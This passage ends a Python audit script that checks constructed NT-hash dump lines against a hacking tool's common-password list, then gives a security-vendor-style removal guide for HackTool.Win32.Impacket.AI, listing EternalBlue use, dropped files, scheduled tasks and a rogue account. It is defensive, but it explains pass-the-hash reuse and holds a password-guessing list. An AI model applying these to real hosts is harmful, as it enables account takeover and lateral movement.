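# Subset of the password list above (only entries that appear on the page).
TOOL_WORDLIST = ["123456", "password", "qwerty", "12345678", "1qaz2wsx", "admin@123",
                 "sa123", "sql2008", "passw0rd", "p@ssword", "welcome", "abc123"]

# Constructed secretsdump-style lines (user:rid:lmhash:nthash:::); not real accounts.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    f"sqlsvc:1104:aad3b435b51404eeaad3b435b51404ee:{nt_hash('sa123')}:::",
    f"svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:{nt_hash('Correct-Horse-Battery-9')}:::",
])


def audit_dump(dump_text: str, wordlist) -> dict:
    """Return {username: matching password} for accounts the tool's list would open."""
    lookup = {nt_hash(p): p for p in wordlist}
    weak = {}
    for line in dump_text.splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, nthash = parts[0], parts[3].lower()
        if nthash in lookup:
            weak[user] = lookup[nthash]
    return weak


if __name__ == "__main__":
    for user, pw in audit_dump(SAMPLE_DUMP, TOOL_WORDLIST).items():
        print(f"{user}: password {pw!r} is in the tool's list")
```

Hashing the list rather than the accounts keeps the comparison one-way, and the same lookup table answers the pass-the-hash question: any NT hash the tool has already collected from one host will log it into every other host that shares that password, whatever the LM half says.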

It takes advantage of the following vulnerabilities:

  • MS17-010 (EternalBlue), the SMBv1 remote code execution vulnerability

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 2.159.00
FIRST VSAPI PATTERN DATE: 26 Mar 2019
VSAPI OPR PATTERN File: 2.160.00
VSAPI OPR PATTERN Date: 27 Mar 2019

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Identify and terminate files detected as HackTool.Win32.Impacket.AI

  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
  3. If the detected file is not displayed in either Windows Task Manager or Process Explorer, continue doing the next steps.

Step 4

Search and delete this file

There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.  
  • {Malware Path}\m2.ps1
  • {Malware Path}\mkatz.ini

On machines this tool reached over SMB, SQL or MS17-010, also look for the artifacts its command sequences write or run there (see Other Details): c:\windows\temp\svchost.exe, dig.exe, msInstall.exe, installed.exe and p.bat; the marker files doadmin.txt, ipc.txt, domain.txt, hash.txt, 143.txt and eb.txt in c:\windows\temp; the copied c:\windows\{random filename}.exe; the scheduled tasks Autocheck, Autostart, Autoload, escan, \Microsoft\windows\Bluetool and {random filename}; the netsh portproxy entries on ports 65531-65533 and their firewall rules; and the local user k8h3d.

Step 5

Scan your computer with your Trend Micro product to delete files detected as HackTool.Win32.Impacket.AI. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files.

